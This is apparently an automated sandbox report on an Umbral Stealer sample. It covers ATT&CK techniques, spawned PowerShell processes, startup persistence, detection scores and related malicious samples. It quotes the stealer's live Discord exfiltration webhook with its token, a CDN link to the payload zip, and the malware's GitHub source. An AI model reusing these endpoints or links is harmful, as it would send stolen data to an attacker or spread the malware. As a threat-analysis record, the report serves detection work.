Credentials | Domains | Default Accounts | 11 Command and Scripting Interpreter | 12 Registry Run Keys / Startup Folder | 11 Process Injection | 21 Disable or Modify Tools | LSASS Memory | 211 Security Software Discovery | Remote Desktop Protocol | 2 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | 12 Registry Run Keys / Startup Folder | 11 Obfuscated Files or Information | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Timestomp | NTDS | 41 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 11 Remote System Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 11 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 41 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1487993 | Sample: IDLBk4XMUa.exe | Startdate: 05/08/2024 | Architecture: WINDOWS | Score: 100
Contacted hosts: ptb.discord.com (162.159.138.232, ports 443, 49707, 49708, CLOUDFLARENETUS, United States); ip-api.com (208.95.112.1, ports 49700, 49705, 80, TUT-ASUS, United States)
Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 14 other signatures
Process IDLBk4XMUa.exe: dropped C:\ProgramData\Microsoft\...\NcIxl.scr (PE32), C:\Windows\System32\drivers\etc\hosts (ASCII), C:\Users\user\AppData\...\IDLBk4XMUa.exe.log (ASCII), C:\ProgramData\...\NcIxl.scr:Zone.Identifier (ASCII); signatures: Suspicious powershell command line found, Found many strings related to Crypto-Wallets (likely being stolen), Self deletion via cmd or bat file, 7 other signatures; started powershell.exe, cmd.exe, powershell.exe and 9 other processes
Process powershell.exe: Loading BitLocker PowerShell Module; started WmiPrvSE.exe, conhost.exe
Process cmd.exe: Uses ping.exe to check the status of other devices and networks; started conhost.exe, PING.EXE
Process powershell.exe: started conhost.exe
Other processes: started conhost.exe (three instances) and 6 other processes

                        SourceDetectionScannerLabelLink
                        IDLBk4XMUa.exe86%VirustotalBrowse
                        IDLBk4XMUa.exe82%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
                        IDLBk4XMUa.exe100%AviraHEUR/AGEN.1307507
                        IDLBk4XMUa.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr100%AviraHEUR/AGEN.1307507
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr100%Joe Sandbox ML
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr82%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr86%VirustotalBrowse
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        ptb.discord.com1%VirustotalBrowse
                        ip-api.com0%VirustotalBrowse
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://www.apache.org/licenses/LICENSE-2.0 | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://www.microsoft. | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
http://ip-api.com | 0% | URL Reputation | safe |
https://oneget.orgX | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://oneget.org | 0% | URL Reputation | safe |
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe |
http://ptb.discord.com | 0% | Avira URL Cloud | safe |
https://media.discordapp.net/attachments/1193832993945563176/12700031 | 0% | Avira URL Cloud | safe |
https://discord.com/api/v10/users/ | 0% | Avira URL Cloud | safe |
https://discordapp.com/api/v9/users/ | 0% | Avira URL Cloud | safe |
https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL | 0% | Avira URL Cloud | safe |
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
https://cdn.discordapp.com/attachments/1193832993945563176/1270003120704983090/Umbral-855271.zip?ex= | 0% | Avira URL Cloud | safe |
https://discord.com/api/v10/users/ | 0% | Virustotal | | Browse
http://ptb.discord.com | 1% | Virustotal | | Browse
https://media.discordapp.net/attachments/1193832993945563176/1270003120704983090/Umbral-855271.zip?e | 0% | Avira URL Cloud | safe |
https://github.com/Blank-c/Umbral-Stealer | 0% | Avira URL Cloud | safe |
https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL | 1% | Virustotal | | Browse
https://github.com/Pester/Pester | 1% | Virustotal | | Browse
https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N | 0% | Avira URL Cloud | safe |
https://ptb.discord.com | 0% | Avira URL Cloud | safe |
http://ip-api.com/json/?fields=225545 | 0% | Avira URL Cloud | safe |
http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806- | 0% | Avira URL Cloud | safe |
https://github.com/Blank-c/Umbral-Stealer | 2% | Virustotal | | Browse
https://ptb.discord.com | 1% | Virustotal | | Browse
https://discordapp.com/api/v9/users/ | 0% | Virustotal | | Browse
http://ip-api.com/json/?fields=225545 | 0% | Virustotal | | Browse
http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806- | 0% | Virustotal | | Browse
https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N | 1% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ptb.discord.com | 162.159.138.232 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 0000000E.00000002.1352099439.00000296B1F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.000001714092F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.0000017140A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.000001713217B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC603000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDE0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B357376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000014.00000002.1406940608.00000171320AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDA18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B356E61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com/api/v10/users/ | NcIxl.scr.0.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001F.00000002.1666525413.000002B35722D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000E.00000002.1329869038.00000296A20D9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ptb.discord.com | IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098129000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001F.00000002.1666525413.000002B35722D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://media.discordapp.net/attachments/1193832993945563176/12700031 | IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FC8000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discordapp.com/api/v9/users/ | IDLBk4XMUa.exe, NcIxl.scr.0.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.discordapp.com/attachments/1193832993945563176/1270003120704983090/Umbral-855271.zip?ex= | IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200981D6000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FC8000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft. | powershell.exe, 00000017.00000002.1609749890.00000268E4994000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000001F.00000002.1666525413.000002B35722D000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://media.discordapp.net/attachments/1193832993945563176/1270003120704983090/Umbral-855271.zip?e | IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200981D6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Blank-c/Umbral-Stealer | NcIxl.scr.0.dr | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000000E.00000002.1329869038.00000296A20D9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000E.00000002.1352099439.00000296B1F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.000001714092F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.0000017140A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.000001713217B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC603000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDE0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B357376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com | IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FD4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 00000014.00000002.1406940608.00000171320AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDA18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B356E61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N | IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098129000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097F71000.00000004.00000800.00020000.00000000.sdmp | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 0000000E.00000002.1329869038.00000296A1EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1372613414.000001D7A745C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1372613414.000001D7A7449000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.00000171308B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B3559C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ptb.discord.com | IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1329869038.00000296A1EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1372613414.000001D7A7425000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.00000171308B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B3559C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.org | powershell.exe, 00000014.00000002.1406940608.00000171320AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDA18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B356E61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com/json/?fields=225545 | IDLBk4XMUa.exe, NcIxl.scr.0.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806- | IDLBk4XMUa.exe, NcIxl.scr.0.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
[Map legend: contacted IPs bucketed by share of total: under 25%, 25% to 50%, 50% to 75%, over 75%]
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | true
162.159.138.232 | ptb.discord.com | United States | | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1487993
Start date and time: 2024-08-05 14:57:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 43
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: IDLBk4XMUa.exe (renamed because original name is a hash value)
Original Sample Name: 0933217d8ea84d9341154ecc34a3f231cf2ff0e70d67dbe190265c7e26b96cfb.exe
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.winEXE@39/24@3/2
                        EGA Information:
                        • Successful, ratio: 16.7%
                        HCA Information:
                        • Successful, ratio: 66%
                        • Number of executed functions: 238
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 216.58.206.35
                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 6328 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7436 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7696 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7820 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 8040 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
08:58:02 | API Interceptor | 5x Sleep call for process: WMIC.exe modified
08:58:05 | API Interceptor | 27x Sleep call for process: powershell.exe modified
08:58:05 | API Interceptor | 3449x Sleep call for process: IDLBk4XMUa.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: 208.95.112.1
  Vjy8d2EoqK.exe | Get hash | malicious | Blank Grabber, DCRat, XWorm | Browse | Context: ip-api.com/json/?fields=225545
  3.bin.exe | Get hash | malicious | Go Injector | Browse | Context: ip-api.com/json/?fields=status,message,query,country,regionName,city,isp,timezone
  raw.ps1 | Get hash | malicious | Unknown | Browse | Context: ip-api.com/json/?fields=status,message,query,country,regionName,city,isp,timezone
  #U202f#U202f#U2005#U00a0.scr.exe | Get hash | malicious | Blank Grabber | Browse | Context: ip-api.com/json/?fields=225545
  NaOH.exe | Get hash | malicious | XWorm | Browse | Context: ip-api.com/line/?fields=hosting
  SSPInstallerV2.exe | Get hash | malicious | Blank Grabber, Umbral Stealer, XWorm | Browse | Context: ip-api.com/json/?fields=225545
  XWorm.V5.6.exe | Get hash | malicious | XWorm | Browse | Context: ip-api.com/line/?fields=hosting
  oc 1337.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | Context: ip-api.com/line/?fields=hosting
  Xbox.exe | Get hash | malicious | XWorm, Xmrig | Browse | Context: ip-api.com/line/?fields=hosting
  setup.exe | Get hash | malicious | XWorm | Browse | Context: ip-api.com/line/?fields=hosting
Match: 162.159.138.232
  http://dc.tensgpt.com/branding/ | Get hash | malicious | Unknown | Browse | (no context)
  SSPInstallerV2.exe | Get hash | malicious | Blank Grabber, Umbral Stealer, XWorm | Browse | (no context)
  VaTlw2kNGc.exe | Get hash | malicious | Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT | Browse | (no context)
  Zoom_workspace.hta | Get hash | malicious | Cobalt Strike, Clipboard Hijacker | Browse | (no context)
  qqgv6uKJOd.exe | Get hash | malicious | Clipboard Hijacker | Browse | (no context)
  http://discord-proxy.tassadar2002.workers.dev/ | Get hash | malicious | Unknown | Browse | (no context)
  http://dapi.190823.xyz/ | Get hash | malicious | Unknown | Browse | (no context)
  LisectAVT_2403002A_147.exe | Get hash | malicious | Blank Grabber | Browse | (no context)
  LisectAVT_2403002A_368.exe | Get hash | malicious | Blank Grabber, DCRat, Umbral Stealer | Browse | (no context)
  Setup 3.0.0.msi | Get hash | malicious | Unknown | Browse | (no context)
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: ip-api.com
  Vjy8d2EoqK.exe | Get hash | malicious | Blank Grabber, DCRat, XWorm | Browse | Context: 208.95.112.1
  3.bin.exe | Get hash | malicious | Go Injector | Browse | Context: 208.95.112.1
  raw.ps1 | Get hash | malicious | Unknown | Browse | Context: 208.95.112.1
  #U202f#U202f#U2005#U00a0.scr.exe | Get hash | malicious | Blank Grabber | Browse | Context: 208.95.112.1
  NaOH.exe | Get hash | malicious | XWorm | Browse | Context: 208.95.112.1
  SSPInstallerV2.exe | Get hash | malicious | Blank Grabber, Umbral Stealer, XWorm | Browse | Context: 208.95.112.1
  XWorm.V5.6.exe | Get hash | malicious | XWorm | Browse | Context: 208.95.112.1
  oc 1337.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | Context: 208.95.112.1
  Xbox.exe | Get hash | malicious | XWorm, Xmrig | Browse | Context: 208.95.112.1
  setup.exe | Get hash | malicious | XWorm | Browse | Context: 208.95.112.1
Match: ptb.discord.com
  golang-modules.exe | Get hash | malicious | Unknown | Browse | Context: 162.159.136.232
  golang-modules.exe | Get hash | malicious | Unknown | Browse | Context: 162.159.137.232
  SetupSpuckwars_1.15.5.exe | Get hash | malicious | Unknown | Browse | Context: 162.159.128.233
  SetupSpuckwars_1.15.5.exe | Get hash | malicious | Unknown | Browse | Context: 162.159.128.233
  KzqQe0QtRd.exe | Get hash | malicious | Unknown | Browse | Context: 162.159.137.232
  PAP46E1UkZ.exe | Get hash | malicious | Unknown | Browse | Context: 162.159.128.233
  A4AxThCBqS.exe | Get hash | malicious | Nanocore, Luna Logger, Umbral Stealer | Browse | Context: 162.159.136.232
  SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exe | Get hash | malicious | CKS Stealer, Spark RAT | Browse | Context: 162.159.137.232
  SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exe | Get hash | malicious | CKS Stealer, Spark RAT | Browse | Context: 162.159.138.232
  Lunar_Builder.exe | Get hash | malicious | ItroublveBOT Stealer | Browse | Context: 162.159.138.232
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: CLOUDFLARENETUS
  https://t.co/Yz5GS35vAm | Get hash | malicious | HTMLPhisher | Browse | Context: 104.17.25.14
  http://mission-bbq.com/ | Get hash | malicious | Unknown | Browse | Context: 162.159.135.42
  Yg4Sqy06Al.exe | Get hash | malicious | FormBook | Browse | Context: 172.67.189.102
  Vjy8d2EoqK.exe | Get hash | malicious | Blank Grabber, DCRat, XWorm | Browse | Context: 162.159.135.233
  New Purchase Order #98540-00_pdf.exe | Get hash | malicious | FormBook | Browse | Context: 104.21.59.240
  TVC4030004.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | Context: 172.67.74.152
  uX2M9PYDL6.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | Context: 188.114.97.3
  kFVFbXvmmW.exe | Get hash | malicious | AgentTesla | Browse | Context: 104.26.12.205
  http://url4388.parishsoft.com/ls/click?upn=u001.Vpzjdhwu4OAeGaWRMrv2bG-2BoISIIiNCoMwLNb33p6s9puXP6QsXcB55N2OsZ6QIQL6ualISvA6R9yFsi3QAkMw-3D-3DXnsm_4xqsswqm6jfqRi4Z9uMkjQPQ2PkIkpXiS7DDGAZwwqNkGayHBacrLCvWB6Ugb4mkRZ3VOwT8CtgdDvVzoEhuyk6RBXBzMUCiGffZILgz6kR-2FL0nL0bxsibxsiUMijyxKfmLW891ickSrYKqWpAo9hCEcRsdCC2tujtVQQrSV8Vz2uroyKvadQlzhc4JKhA7jHhTUxKABBY7atxFYwVCPFB5me96L6dyoMp-2FtDuDTirn5yJY0-2FgMFIFSldNhOOGkWZFlvdMYsSUWRFKEWdA6MNjw9lUNWdhKLgUqvqHz9yAXZOqRQ6z8xUDj4ZDVoAP4jrKwzE6kfZ8QZJlON1P64VH3LTUAC-2F3-2Bu3E-2Bv-2F-2FvtH0U-3D | Get hash | malicious | Unknown | Browse | Context: 1.1.1.1
  https://shoutout.wix.com/so/57P4LPRB3/c?w=QyObRC2ER359WwNEkFtFRIXvHqRVLYBWPJZndFVxaFM.eyJ1IjoiaHR0cHM6Ly90LmNvL2dYUTZ1aVRTYzQiLCJyIjoiNzk1YmZlN2YtZDJkZS00NTQzLTkwODItYWRmOTcyNmMzMTVjIiwibSI6Im1haWwiLCJjIjoiMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDAwIn0 | Get hash | malicious | Phisher | Browse | Context: 188.114.96.3
Match: TUT-ASUS
  Vjy8d2EoqK.exe | Get hash | malicious | Blank Grabber, DCRat, XWorm | Browse | Context: 208.95.112.1
  3.bin.exe | Get hash | malicious | Go Injector | Browse | Context: 208.95.112.1
  raw.ps1 | Get hash | malicious | Unknown | Browse | Context: 208.95.112.1
  #U202f#U202f#U2005#U00a0.scr.exe | Get hash | malicious | Blank Grabber | Browse | Context: 208.95.112.1
  NaOH.exe | Get hash | malicious | XWorm | Browse | Context: 208.95.112.1
  SSPInstallerV2.exe | Get hash | malicious | Blank Grabber, Umbral Stealer, XWorm | Browse | Context: 208.95.112.1
  XWorm.V5.6.exe | Get hash | malicious | XWorm | Browse | Context: 208.95.112.1
  oc 1337.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | Context: 208.95.112.1
  Xbox.exe | Get hash | malicious | XWorm, Xmrig | Browse | Context: 208.95.112.1
  setup.exe | Get hash | malicious | XWorm | Browse | Context: 208.95.112.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
  Vjy8d2EoqK.exe | Get hash | malicious | Blank Grabber, DCRat, XWorm | Browse | Context: 162.159.138.232
  doc_RFQ NEW ORDER #2400228341.pdf.exe | Get hash | malicious | AsyncRAT | Browse | Context: 162.159.138.232
  TVC4030004.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | Context: 162.159.138.232
  kFVFbXvmmW.exe | Get hash | malicious | AgentTesla | Browse | Context: 162.159.138.232
  https://shoutout.wix.com/so/57P4LPRB3/c?w=QyObRC2ER359WwNEkFtFRIXvHqRVLYBWPJZndFVxaFM.eyJ1IjoiaHR0cHM6Ly90LmNvL2dYUTZ1aVRTYzQiLCJyIjoiNzk1YmZlN2YtZDJkZS00NTQzLTkwODItYWRmOTcyNmMzMTVjIiwibSI6Im1haWwiLCJjIjoiMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDAwIn0 | Get hash | malicious | Phisher | Browse | Context: 162.159.138.232
  Payment receipt.exe | Get hash | malicious | AgentTesla | Browse | Context: 162.159.138.232
